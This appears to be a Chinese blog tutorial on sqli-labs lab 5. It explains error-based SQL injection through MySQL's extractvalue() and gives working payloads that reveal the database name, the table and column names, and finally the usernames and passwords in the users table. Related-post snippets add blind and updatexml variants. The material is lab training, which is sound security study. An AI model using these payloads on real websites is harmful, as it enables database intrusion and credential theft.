利用extractvalue报错注入sqli-labs第五关

最新推荐文章于 2024-03-29 13:46:29 发布
最新推荐文章于 2024-03-29 13:46:29 发布
阅读量263 收藏 1
点赞数 1
文章标签: sql 数据库 web安全 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64080230/article/details/131323896
版权

一、环境及工具

sqli-labs第五关   火狐浏览器  hackbar

二、知识点

1、报错注入(Error-based Injection)是SQL注入的一种形式,利用了应用程序返回的错误消息来获取数据库信息。它的原理是通过构造恶意的SQL查询,当应用程序在执行这些查询时发生错误,错误消息中可能包含了有关数据库结构、表名、列名或其他敏感信息的相关细节。攻击者可以利用这些错误消息来推断数据库的结构,进而进行进一步的攻击。

2、extractvalue()函数

是一个用于从 XML 数据中提取特定节点值的函数。它用于从 XML 文档中检索元素或属性的值。

extractvalue() 函数接受两个参数:一个是 XML 文档或 XML 字符串,另一个是一个 XPath 表达式。XPath 是一种用于在 XML 文档中定位节点的语言

如:

SELECT EXTRACTVALUE(xml_data, '/bookstore/book/title') AS title;

这句sql语句的意思是从使用 EXTRACTVALUE() 函数和 路径表达式 /bookstore/book/title,我们提取了书的标题。结果将作为 title 列返回

3、报错信息的利用

如果我们将extractvalue()函数的路径表达式格式故意写错,如将前面的反斜杠改成‘~’,即‘~bookstore/book/title',我们将会得到一段提示报错信息。

如:

select extractvalue(doc,concat(0x7e,(select database()))) from xml;

这句可以将当前表所在的database同报错信息一同输出到屏幕当中,而攻击者则可以利用这段报错信息构建sql语句获取敏感信息。

三、实操示例

sqli-labs第五关:

1、根据报错信息判断出是单引号字符型

2、利用extractvalue()报错爆出库名为security

?id=100' and 1=extractvalue(1,concat(0x7e,(select database()))) --+

 注:其中concat()是将两字符串拼接成一串,这里的0x7e对应字符为’~‘

此时执行的sql语句为:

select * from users where id='100' and 1=extractvalue(1,concat(0x7e,(select database()))) --+'

而此时extractvalue()路径表达式错误,提示错误将连同database()函数执行并显示出来。

3、获取所需数据表名

?id=100' and 1=extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+

 可以看出爆出了几个在所在数据库的表名,其中users表是我们需要的表名

4、获取users表中的列名

?id=100' and 1=extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))) --+

此时我们爆出了users表中的三列内容,分别如图所示

4、爆出用户名与密码

?id=100' and 1=extractvalue(1,concat(0x7e,(select substring(group_concat(username,'--',password),1,31) from users))) --+

此时我们可以看到已经爆出了表中的用户名跟密码了,不过报错注入的缺点是默认返回固定的字符串数,而我们可以用substring()函数,通过更改参数方便我们查看

哼哼啊啊啊啊啊啊
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs第五sql注入流程
qq_33598708的博客
03-30 5711
正常访问 http://127.0.0.1/sqli-labs-master/less-5/?id=1 判断注入类型 http://127.0.0.1/sqli-labs-master/less-5/?id=1' and 1=2 根据报错可以知道是字符注入,使用 ' 进行闭合。 通过 ' 闭合查询无返回的数据,无论是有数据返回还是无数据返回页面都不会显示相的数据。 所以这的重点是盲注。 http://127.0.0.1/sqli-labs-master/less-5/?id=
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sql_lab_第5 Python源码SQL注入
04-25
SQLI-LAB是专门练习SQL注入的实验环境,最新有69道题涵盖了SQL注入的所有分类,相下载链接:https://github.com/Audi-1/sqli-labs
基于Sqli-Labs靶场的SQL注入-第五(重点讲双查询注入)
Joker
11-19 4087
双查询是指两个查询语句的嵌套,也就是一个select语句中在去套一个select语句,然后利用group by 语句和floor函数的结合去报错,再将我们需要的信息显示到报错信息中。
sql-labs SQL注入平台-第5Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)
Onlyone_1314的博客
09-03 454
Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)
Sql注入之sqllab第5使用函数练习
ailkli的博客
06-12 165
ascii判断大小写。
phpstudy+靶场sqli-labs-master下载
11-08
6. **Sqli-Labs实战**:熟悉靶场的结构,逐级破解每个级别的挑战,通过实践学习如何识别和利用SQL注入漏洞,以及如何防止此类攻击。 7. **安全编程**:学习如何在PHP中编写安全的代码,如使用预编译语句(PDO或...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
jeakinscheung-sqli-labs-php7-master.zip
03-16
在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室(Sqli Labs)代码仅适用于PHP5,而许多开发者现在正在使用PHP7。这引发了两个主要的知识点:PHP版本兼容性和SQL注入的防范。 ...
sqli-labs(php7.3以上可运行)
01-29
sqli-labs中,你可以扮演黑客的角色,尝试找出并利用SQL注入漏洞,这有助于提升你的安全意识和测试技能。渗透测试工具如Burp Suite、Sqlmap等,可以辅助进行自动化扫描和漏洞利用。 五、漏洞环境 sqli-labs提供了...
sqlilabs(SQL注入)小白通基础通笔记(专针对小白)(第五Less-5)
u013630181的博客
07-05 227
第五讲的是学会前面四后,单纯的一个一个提取出数据太麻烦,你可以通过burpsuite批量爬取,或者是自己用java写一个程序进行爬取。(算是跑字典吧) sqlilabs这些sql注入漏洞是怎么发现的你可以用Acunetix+sqlmap进行扫,当然sqlilabs的主要意图是让你学会sql注入的基础,当然后期也可以弄上安全狗等防护软件来练习。 so这里就涉及到了burpsuite的操作推荐把这两个个视频看完详细了解burpsuite:链接①链接② ...
bwapp---sql注入第五过程及分析
weixin_45821250的博客
12-04 1118
你可以理解为你看见的页面是一个静态的但是存在局部动态,你一输入他就立刻反应给另一个页面查询饭后这,你可已利用F12里的网络刷新查看(和bp抓包一样能看)
Sqli - Labs第一 extractvalue报错注入简易教程,速成extractvalue报错注入
weixin_74320581的博客
05-18 254
Sqli - Labs第一 extractvalue报错注入简易教程,速成extractvalue报错注入
SQL——labs第5、6(报错注入)
m0_72471814的博客
07-27 149
第二步:正确之后页面只有一个you are in。第六步:爆破账号密码。
sqli-lab第5---第10
qq_54037445的博客
10-06 1883
sqli-lab,get类型,时间盲注,布尔盲注,报错注入,详细讲解
sql注入学习(3)第5和6报错注入
qfslyy的博客
12-26 483
今天exp注入时发现数据库版本不对,老版本phpstudy不能换数据库版本,于是换了小皮,但是怎么都连不上数据库,最后发现时php版本忘换了,gan。 先了解一下别的注入: exp和updatexml exp: and exp(~(select xfrom(select x from x.x))x)) 第一举例: 使用这种方式获得数据库名。欧克了 报错注入: updatexml(要操作的文件名,(构造一个xpath语法),新值) updatexml(1,(concat(0x23,(database())
sql-labs 闯 5~10
qq_44663230的博客
08-14 1586
sql-labs 第5~10 盲注系列
sqli第五报错注入
最新发布
gchoud的博客
03-29 462
这是用于定位要更新的节点的路径表达式。XPath 是一种用于在 XML 文档中导航和选择节点的语言。如果是~则报如下错:XPATH syntax error: '~'函数用于在 XML 文档中更新特定节点的值。:这通常是一个包含 XML 数据的列或变量。是一个 XPath 表达式,它选择了所有具有。:这是要设置给选定节点的新值。该报错最多回显32个字符(所有要截取)xpath出现特殊字符会报错;源码(单引号闭合但是没有回显)列存储了 XML 文档。是要设置的新部门名称。updatexml注入。
基于Sqli-Labs靶场的报错注入合集(以第五为例子)
Joker
11-26 800
本文整合了12种报错注入,想了解报错注入的可以阅读一下。
sqli-labs第五解法
10-14
sqli-labs第五是一个基于时间的盲注漏洞,需要使用时间延迟来判断SQL语句的执行结果。以下是解题步骤: 1. 在输入框中输入 `' and if(substr(database(),1,1)='s',sleep(5),1)#`,其中 `substr(database(),1,1)` ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值